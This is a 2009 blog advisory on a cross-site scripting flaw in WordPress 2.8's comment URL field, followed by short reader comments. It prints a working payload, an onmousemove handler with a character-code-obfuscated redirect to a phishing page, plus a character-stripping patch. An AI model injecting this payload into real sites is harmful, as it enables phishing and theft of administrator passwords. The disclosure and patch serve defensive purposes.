Wordpress 2.8 All Version Xss 0DAY

    [晴 July 18, 2009 08:59 | by !4p47hy ]
From:vul.kr

It had been published that wordpress 2.8 All version are suffering from Xss,attackers can use this to do fishing,they make a wordpress login page as it is your own.If you don’t take care,your password will be sent to the attacker’s website.With your password,they can edit pages and upload webshell.It is harmful.

How is the attacker do this?
they insert website url like this(in the comments write place):
http://www.lengmo.net’onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,119,119,119,46,118,117,108,46,107,114,47,63,112,61,53,54,57);

If someone(or administrator) moved his mouse on the author’s website.It will jump to another URL,which is a fishing page.

How can we patch it?Edit wp-comments-post.php  go line 40 and then add:
$comment_author_url = str_replace(chr(39),”,$comment_author_url);
$comment_author_url = str_replace(chr(59),”,$comment_author_url);
$comment_author_url = str_replace(chr(44),”,$comment_author_url);


Highslide JS


Webmasters,please patch it as soon as you can.
Tags: , , , ,
Bug&Exp | Comments(2) | Trackbacks(0) | Reads(15741)
duyao Email Homepage
July 21, 2009 13:58
换玉米了
毒药's Blog
www.duyao.hk
帮忙改下,谢拉。
!4p47hy replied on July 21, 2009 19:41
OK ...已经修改好了···
酷爱学习 Email Homepage
July 18, 2009 14:18
OK啦,英文还算能看懂点。
Pages: 1/1 First page 1 Final page
Add a comment
Emots
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
emotemotemotemotemot
Enable HTML
Enable UBB
Enable Emots
Hidden
Nickname   Password   Optional
Site URI   Email   [Register]
               

Security code Case insensitive